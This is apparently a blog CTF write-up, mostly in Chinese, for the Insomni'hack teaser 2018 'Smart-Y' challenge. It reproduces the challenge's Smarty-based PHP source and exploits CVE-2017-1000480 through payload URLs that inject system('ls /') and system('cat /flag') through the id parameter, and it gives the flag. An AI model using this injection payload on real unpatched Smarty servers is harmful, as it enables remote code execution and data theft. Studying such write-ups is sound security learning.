Chybeta

Insomni'hack teaser 2018-Smart-Y-writeup

Insomni’hack teaser 2018-Smart-Y-writeup

CVE-2017-1000480-Smarty-3-1-32-php代码执行-漏洞

题目

1
2
3
Last year, a nerd destroyed the system of Robot City by using some evident flaws. It seems that the system has changed and is not as evident to break now.
http://smart-y.teaser.insomnihack.ch

Solution

题目给了源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php
if(isset($_GET['hl'])){ highlight_file(__FILE__); exit; }
include_once('./smarty/libs/Smarty.class.php');
define('SMARTY_COMPILE_DIR','/tmp/templates_c');
define('SMARTY_CACHE_DIR','/tmp/cache');
class news extends Smarty_Resource_Custom
{
protected function fetch($name,&$source,&$mtime)
{
$template = "The news system is in maintenance. Please wait a year. <a href='/console.php?hl'>".htmlspecialchars("<<<DEBUG>>>")."</a>";
$source = $template;
$mtime = time();
}
}
// Smarty configuration
$smarty = new Smarty();
$my_security_policy = new Smarty_Security($smarty);
$my_security_policy->php_functions = null;
$my_security_policy->php_handling = Smarty::PHP_REMOVE;
$my_security_policy->modifiers = array();
$smarty->enableSecurity($my_security_policy);
$smarty->setCacheDir(SMARTY_CACHE_DIR);
$smarty->setCompileDir(SMARTY_COMPILE_DIR);
$smarty->registerResource('news',new news);
$smarty->display('news:'.(isset($_GET['id']) ? $_GET['id'] : ''));

由源码的简洁性,推测是smarty框架的漏洞。通过扫目录可以发现存在smarty目录

查看change-log,得出smarty版本为3.1.31

利用CVE-2017-1000480-Smarty-3-1-32-php代码执行-漏洞

1
http://smart-y.teaser.insomnihack.ch/console.php?id=*/system('ls /');//

1
http://smart-y.teaser.insomnihack.ch/console.php?id=*/system('cat /flag');//

flag:

1
INS{why_being_so_smart-y}

点击赞赏二维码,您的支持将鼓励我继续创作!
chybeta WeChat Pay

微信打赏

chybeta Alipay

支付宝打赏

本文标题:Insomni'hack teaser 2018-Smart-Y-writeup

文章作者:chybeta

发布时间:2018年01月23日 - 20:01

最后更新:2018年01月23日 - 20:01

原始链接:http://chybeta.github.io/2018/01/23/Insomni-hack-teaser-2018-Smart-Y-writeup/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。